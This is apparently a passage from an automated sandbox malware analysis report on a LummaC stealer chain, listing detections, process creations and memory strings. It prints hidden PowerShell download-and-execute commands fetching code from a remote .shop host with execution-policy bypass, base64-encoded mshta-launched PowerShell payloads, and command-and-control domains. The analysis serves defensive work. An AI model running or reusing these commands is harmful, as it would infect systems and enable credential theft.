e3H2EdbeLafYS5yxTT5FZ0L6oNRwvWoa+f+Xm7iymlzOScojqMozj9eU2Aaaq9Lh0U+H1c/xVdN3Inn6Q7ev0uI6CefwdEf49j5P72GeX3D2lgyNokHGNGs+PUY0Sd5qKP4Vuu43i7WMUbh/iS6DDImkdpOiQj4p2HNVU4ywO+YI/pGZNNszhSUG0SzAKQUFALXsETtttncVxmN2zaLPb8MtmnRAgu47KmLRvWQ7WbwOC1Nt/sDQeR0kB8fZpZ4CJPmaiTdcgeOZb8n49nue/7ynrZu9zN72PowBd7rYKIPn4GfVZ/CbdMwEqjRwBtmOSrz8Qp2+RrQufbVAU6PYRgHrf6oC8Yy8++J4YijqBQ5lfRM4QwUVsR09Oi8THWMsuoOkVo6Lt5um6
                              Source: powershell.exe, 00000002.00000002.2171562645.0000000007B4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                              Source: powershell.exe, 0000000A.00000002.2609507490.00000000029AC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
                              Source: powershell.exe, 00000004.00000002.2511388089.00000000077FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043E9F0 LdrInitializeThunk,10_2_0043E9F0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Yara detected Powershell download and execute
                              Source: Yara matchFile source: amsi32_1600.amsi.csv, type: OTHER
                              Source: Yara matchFile source: amsi32_2104.amsi.csv, type: OTHER
                              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR
                              Bypasses PowerShell execution policy
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))"
                              Encrypted powershell cmdline option found
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded $OeA6ZG97ZDb7RhilmF49ZV2BnnuCvb6X9rWd1B6Eb7m9x9yovTdsk7xUKNlM0IXOO5YfTTsfNCBB1UFTvZ8dxkRCk2BgbFqWJFgd5iZ3VPV5vC2D6Z726et3L3hDBuTRExf90ffbWrR5U8VUTUhiWPYeyR8qztS4RQGJDW2sLiqvglSGqI15vNKVCXyQfSvqOna0DVkba3BqT2Hs90KOu3X4GC6RzbuWfYCAGXHUPMgoCsRFoyjufwTlbvm7Cw3chQOosuMatc5CwkYcdZacJ7gIPlWtoSktD96eMcnXhyZ5yyDEr9jQjqJj8Ne4fxGizNyFAEeMZW03SZZgvQYjmrtUWL7k7Ydp4LlNox1C8QbfOYoRvWrxSKAZ3iiZrMxLdgxYbabG1jk2wwVjEayNlB4y3yY2eOLEDRBKWUNfdnlRN3EH1ahbW5PJyXLZlYoIsfFgCfni5gkG19vqCmLEiuELfmxsFKo7Licde8A57VjySFcolJ9rdNOPJfVM9zoAYqutZ6qqDZWr2tAznJUaHaJdWZyYfmzJJ456ZrgpsDsCvIwscFAm6VHaTh7uLZonclBTYmRQpXYnDUCbomVRLbtS9wnfVJQNIJgmYGpyOFOZ6fPEMBS9ogbHHrwfqSRH6Nba8fFkRgGyev0xq11UOhV4hR6X1g39kS7ATYDHhe3tH6BdrTCHc6N2adkcuxhteoRe6afz5UDnbgNQK9rBK2euf7rrbX5zDpr8bTDNMYaZzrG237snzZNHNUsHbtxTu0j1YIfbZOrs9lJqNcyVxki2THTxB5Z7JAMwy9Bl5QcWNAkz4dQbpweh3wQZFR0dKGoJn = $fALse$50sD4Ns3oM0rPE34WJoDB5txgKNd2ppm8U3VD6gntnuUaBhRKIR6CYMtm9cAPVyelKD2ICAd6d4EsQEE7A0ziwY9kr0SN4h1vyxQYQiG0ScNwQLrNQtP2SCsvtwkcE1i4PRMrGGgfy13zUf5d3fzOmMMOKZBKKdaS0UX9VXXT3tc0OTCSJJl8ZtXivSuB4Q04CWQTT56AjR2MwWoUNZncJJnYIN8JQO7Khq2Z770c6NzHcjns5C4VQ0arcp5ZCOcKhOxyACTEKpeUlLsQbOF1V0Brs6QoegeZYoWIbVwMIJCxKOn63iNmE6aMnGN0U73OxHPFGScmZeyajIlwFlWDmy0jFBZhydEshTwzeiM7c4keoSZ8u8ukjTu0vPoHSz1deY3UNmmbswjiOPnjm0b62A1YXHtRqZ9BNyzjPaiy4k8Hg0QEK5ueneaMNXj6wwL2iH3v3otmRVrxtHzeM16WrS5GdTNxxarRvzgiWY7cmfFcRu1yB61P63yHIRlEqPJFZ3f9zhwYgG3bBHq4GjrCknRpOkmKN1PVwSPgCOnpKxXLFJsIqJoTLKasC1hIuNJoahPQaM7MTStz7LzIZ4GofPErUuQ8o2WeRnCF6SGP66vm9NtrFsz7S0DJFqqzEqxZwh
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded $OeA6ZG97ZDb7RhilmF49ZV2BnnuCvb6X9rWd1B6Eb7m9x9yovTdsk7xUKNlM0IXOO5YfTTsfNCBB1UFTvZ8dxkRCk2BgbFqWJFgd5iZ3VPV5vC2D6Z726et3L3hDBuTRExf90ffbWrR5U8VUTUhiWPYeyR8qztS4RQGJDW2sLiqvglSGqI15vNKVCXyQfSvqOna0DVkba3BqT2Hs90KOu3X4GC6RzbuWfYCAGXHUPMgoCsRFoyjufwTlbvm7Cw3chQOosuMatc5CwkYcdZacJ7gIPlWtoSktD96eMcnXhyZ5yyDEr9jQjqJj8Ne4fxGizNyFAEeMZW03SZZgvQYjmrtUWL7k7Ydp4LlNox1C8QbfOYoRvWrxSKAZ3iiZrMxLdgxYbabG1jk2wwVjEayNlB4y3yY2eOLEDRBKWUNfdnlRN3EH1ahbW5PJyXLZlYoIsfFgCfni5gkG19vqCmLEiuELfmxsFKo7Licde8A57VjySFcolJ9rdNOPJfVM9zoAYqutZ6qqDZWr2tAznJUaHaJdWZyYfmzJJ456ZrgpsDsCvIwscFAm6VHaTh7uLZonclBTYmRQpXYnDUCbomVRLbtS9wnfVJQNIJgmYGpyOFOZ6fPEMBS9ogbHHrwfqSRH6Nba8fFkRgGyev0xq11UOhV4hR6X1g39kS7ATYDHhe3tH6BdrTCHc6N2adkcuxhteoRe6afz5UDnbgNQK9rBK2euf7rrbX5zDpr8bTDNMYaZzrG237snzZNHNUsHbtxTu0j1YIfbZOrs9lJqNcyVxki2THTxB5Z7JAMwy9Bl5QcWNAkz4dQbpweh3wQZFR0dKGoJn = $fALse$50sD4Ns3oM0rPE34WJoDB5txgKNd2ppm8U3VD6gntnuUaBhRKIR6CYMtm9cAPVyelKD2ICAd6d4EsQEE7A0ziwY9kr0SN4h1vyxQYQiG0ScNwQLrNQtP2SCsvtwkcE1i4PRMrGGgfy13zUf5d3fzOmMMOKZBKKdaS0UX9VXXT3tc0OTCSJJl8ZtXivSuB4Q04CWQTT56AjR2MwWoUNZncJJnYIN8JQO7Khq2Z770c6NzHcjns5C4VQ0arcp5ZCOcKhOxyACTEKpeUlLsQbOF1V0Brs6QoegeZYoWIbVwMIJCxKOn63iNmE6aMnGN0U73OxHPFGScmZeyajIlwFlWDmy0jFBZhydEshTwzeiM7c4keoSZ8u8ukjTu0vPoHSz1deY3UNmmbswjiOPnjm0b62A1YXHtRqZ9BNyzjPaiy4k8Hg0QEK5ueneaMNXj6wwL2iH3v3otmRVrxtHzeM16WrS5GdTNxxarRvzgiWY7cmfFcRu1yB61P63yHIRlEqPJFZ3f9zhwYgG3bBHq4GjrCknRpOkmKN1PVwSPgCOnpKxXLFJsIqJoTLKasC1hIuNJoahPQaM7MTStz7LzIZ4GofPErUuQ8o2WeRnCF6SGP66vm9NtrFsz7S0DJFqqzEqxZwhJump to behavior
                              LummaC encrypted strings found
                              Source: powershell.exeString found in binary or memory: growthselec.bond
                              Source: powershell.exeString found in binary or memory: immolatechallen.bond
                              Source: powershell.exeString found in binary or memory: crookedfoshe.bond
                              Source: powershell.exeString found in binary or memory: strivehelpeu.bond
                              Source: powershell.exeString found in binary or memory: idealizetreez.shop
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc jabpaguaqqa2afoarwa5adcawgbeagianwbsaggaaqbsag0arga0adkawgbwadiaqgbuag4adqbdahyayga2afgaoqbyafcazaaxaeiangbfagianwbtadkaeaa5ahkabwb2afqazabzagsanwb4afuaswboagwatqawaekawabpae8anqbzagyavabuahmazgboaemaqgbcadeavqbgafqadgbaadgazab4agsaugbdagsamgbcagcaygbgaheavwbkaeyazwbkaduaaqbaadmavgbqafyanqb2aemamgbeadyawga3adiangblahqamwbmadmaaabeaeiadqbuafiarqb4agyaoqawagyazgbiafcacgbsaduavqa4afyavqbuafuaaabpafcauabzaguaeqbsadgacqb6ahqauwa0afiauqbhaeoarabxadiacwbmagkacqb2agcababtaecacqbjadeanqb2ae4aswbwaemawab5afeazgbtahyacqbpag4ayqawaeqavgbragiayqazaeiacqbuadiasabzadkamablae8adqazafganabhaemangbsahoaygb1afcazgbzaemaqqbhafgasabvafaatqbnag8aqwbzafiargbvahkaagb1agyadwbuagwaygb2ag0anwbdahcamwbjaggauqbpag8acwb1ae0ayqb0agmanqbdahcaawbzagmazabaageaywbkadcazwbjafaababxahqabwbtagsadabeadkangblae0aywbuafgaaab5afoanqb5ahkarabfahiaoqbqafeaagbxaeoaaga4ae4azqa0agyaeabhagkaegboahkargbbaeuazqbnafoavwawadmauwbaafoazwb2afeawqbqag0acgb0afuavwbmadcaawa3afkazabwadqatabsae4abwb4adeaqwa4afeaygbmae8awqbvafiadgbxahiaeabtaesaqqbaadmaaqbpafoacgbnahgatabkagcaeabzagiayqbiaecamqbqagsamgb3ahcavgbqaeuayqb5ae4ababcadqaeqazahkawqayaguatwbmaeuarabsaeiaswbxafuatgbmagqabgbsafiatgazaeuasaaxageaaabiafcanqbqaeoaeqbyaewawgbsafkabwbjahmazgbgagcaqwbmag4aaqa1agcaawbhadeaoqb2aheaqwbtaewarqbpahuarqbmagyabqb4ahmargblag8anwbmagkaywbkaguaoabbaduanwbwagoaeqbtaeyaywbvagwasga5ahiazaboae8auabkagyavgbnadkaegbvaeeawqbxahuadabaadyacqbxaeqawgbxahiamgb0aeeaegbuaeoavqbhaegayqbkagqavwbaahkawqbmag0aegbkaeoanaa1adyawgbyagcacabzaeqacwbdahyasqb3ahmaywbgaeeabqa2afyasabhafqaaaa3ahuatabaag8abgbjagwaqgbuafkabqbsafeacabyafkabgbeafuaqwbiag8abqbwafiatabiahqauwa5ahcabgbmafyasgbrae4asqbkagcabqbzaecacab5ae8argbpafoangbmafaarqbnaeiauwa5ag8azwbiaegasabyahcazgbxafmaugbiadyatgbiageaoabmaeyaawbsagcarwb5aguadgawahgacqaxadeavqbpaggavga0aggauga2afgamqbnadmaoqbrafmanwbbafqawqbeaegaaabladmadabiadyaqgbkahiavabdaegaywa2ae4amgbhagqaawbjahuaeaboahqazqbvafiazqa2ageazgb6aduavqbeag4aygbnae4auqbladkacgbcaesamgblahuazga3ahiacgbiafganqb6aeqacabyadgaygbuaeqatgbnafkayqbaahoacgbhadiamwa3ahmabgb6afoatgbiae4avqbzaegaygb0ahgavab1adaaagaxafkasqbmagiawgbpahiacwa5agwasgbxae4aywb5afyaeabragkamgbuaegavab4aeianqbaadcasgbbae0adwb5adkaqgbsaduauqbjafcatgbbagsaega0agqauqbiahaadwblaggamwb3afeawgbgafiamabkaesarwbvaeoabgagad0aiaakagyaqqbmahmazqanaaoajaa1adaacwbeadqatgbzadmabwbnadaacgbqaeuamwa0afcasgbvaeqaqga1ahqaeabnaesatgbkadiacabwag0aoabvadmavgbeadyazwbuahqabgb1afuayqbcaggaugblaekauga2aemawqbnahqabqa5agmaqqbqafyaeqblagwaswbeadiasqbdaeeazaa2agqanabfahmauqbfaeuanwbbadaaegbpahcawqa5agsacgawafmatga0aggamqb2ahkaeabrafkauqbpaecamabtagmatgb3afeatabyae4auqb0afaamgbtaemacwb2ahqadwbragmarqaxagkanabqafiatqbyaecarwbnagyaeqaxadmaegbvagyanqbkadmazgb6ae8abqbnae0atwblafoaqgblaesazabhafmamabvafgaoqbwafgawabuadmadabjadaatwbuaemauwbkaeoabaa4afoadabyagkadgbtahuaqga0afeamaa0aemavwbrafqavaa1adyaqqbqafiamgbnahcavwbvafuatgbaag4aywbkaeoabgbzaekatga4aeoauqbpadcaswboahea
                              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc jabpaguaqqa2afoarwa5adcawgbeagianwbsaggaaqbsag0arga0adkawgbwadiaqgbuag4adqbdahyayga2afgaoqbyafcazaaxaeiangbfagianwbtadkaeaa5ahkabwb2afqazabzagsanwb4afuaswboagwatqawaekawabpae8anqbzagyavabuahmazgboaemaqgbcadeavqbgafqadgbaadgazab4agsaugbdagsamgbcagcaygbgaheavwbkaeyazwbkaduaaqbaadmavgbqafyanqb2aemamgbeadyawga3adiangblahqamwbmadmaaabeaeiadqbuafiarqb4agyaoqawagyazgbiafcacgbsaduavqa4afyavqbuafuaaabpafcauabzaguaeqbsadgacqb6ahqauwa0afiauqbhaeoarabxadiacwbmagkacqb2agcababtaecacqbjadeanqb2ae4aswbwaemawab5afeazgbtahyacqbpag4ayqawaeqavgbragiayqazaeiacqbuadiasabzadkamablae8adqazafganabhaemangbsahoaygb1afcazgbzaemaqqbhafgasabvafaatqbnag8aqwbzafiargbvahkaagb1agyadwbuagwaygb2ag0anwbdahcamwbjaggauqbpag8acwb1ae0ayqb0agmanqbdahcaawbzagmazabaageaywbkadcazwbjafaababxahqabwbtagsadabeadkangblae0aywbuafgaaab5afoanqb5ahkarabfahiaoqbqafeaagbxaeoaaga4ae4azqa0agyaeabhagkaegboahkargbbaeuazqbnafoavwawadmauwbaafoazwb2afeawqbqag0acgb0afuavwbmadcaawa3afkazabwadqatabsae4abwb4adeaqwa4afeaygbmae8awqbvafiadgbxahiaeabtaesaqqbaadmaaqbpafoacgbnahgatabkagcaeabzagiayqbiaecamqbqagsamgb3ahcavgbqaeuayqb5ae4ababcadqaeqazahkawqayaguatwbmaeuarabsaeiaswbxafuatgbmagqabgbsafiatgazaeuasaaxageaaabiafcanqbqaeoaeqbyaewawgbsafkabwbjahmazgbgagcaqwbmag4aaqa1agcaawbhadeaoqb2aheaqwbtaewarqbpahuarqbmagyabqb4ahmargblag8anwbmagkaywbkaguaoabbaduanwbwagoaeqbtaeyaywbvagwasga5ahiazaboae8auabkagyavgbnadkaegbvaeeawqbxahuadabaadyacqbxaeqawgbxahiamgb0aeeaegbuaeoavqbhaegayqbkagqavwbaahkawqbmag0aegbkaeoanaa1adyawgbyagcacabzaeqacwbdahyasqb3ahmaywbgaeeabqa2afyasabhafqaaaa3ahuatabaag8abgbjagwaqgbuafkabqbsafeacabyafkabgbeafuaqwbiag8abqbwafiatabiahqauwa5ahcabgbmafyasgbrae4asqbkagcabqbzaecacab5ae8argbpafoangbmafaarqbnaeiauwa5ag8azwbiaegasabyahcazgbxafmaugbiadyatgbiageaoabmaeyaawbsagcarwb5aguadgawahgacqaxadeavqbpaggavga0aggauga2afgamqbnadmaoqbrafmanwbbafqawqbeaegaaabladmadabiadyaqgbkahiavabdaegaywa2ae4amgbhagqaawbjahuaeaboahqazqbvafiazqa2ageazgb6aduavqbeag4aygbnae4auqbladkacgbcaesamgblahuazga3ahiacgbiafganqb6aeqacabyadgaygbuaeqatgbnafkayqbaahoacgbhadiamwa3ahmabgb6afoatgbiae4avqbzaegaygb0ahgavab1adaaagaxafkasqbmagiawgbpahiacwa5agwasgbxae4aywb5afyaeabragkamgbuaegavab4aeianqbaadcasgbbae0adwb5adkaqgbsaduauqbjafcatgbbagsaega0agqauqbiahaadwblaggamwb3afeawgbgafiamabkaesarwbvaeoabgagad0aiaakagyaqqbmahmazqanaaoajaa1adaacwbeadqatgbzadmabwbnadaacgbqaeuamwa0afcasgbvaeqaqga1ahqaeabnaesatgbkadiacabwag0aoabvadmavgbeadyazwbuahqabgb1afuayqbcaggaugblaekauga2aemawqbnahqabqa5agmaqqbqafyaeqblagwaswbeadiasqbdaeeazaa2agqanabfahmauqbfaeuanwbbadaaegbpahcawqa5agsacgawafmatga0aggamqb2ahkaeabrafkauqbpaecamabtagmatgb3afeatabyae4auqb0afaamgbtaemacwb2ahqadwbragmarqaxagkanabqafiatqbyaecarwbnagyaeqaxadmaegbvagyanqbkadmazgb6ae8abqbnae0atwblafoaqgblaesazabhafmamabvafgaoqbwafgawabuadmadabjadaatwbuaemauwbkaeoabaa4afoadabyagkadgbtahuaqga0afeamaa0aemavwbrafqavaa1adyaqqbqafiamgbnahcavwbvafuatgbaag4aywbkaeoabgbzaekatga4aeoauqbpadcaswboaheaJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
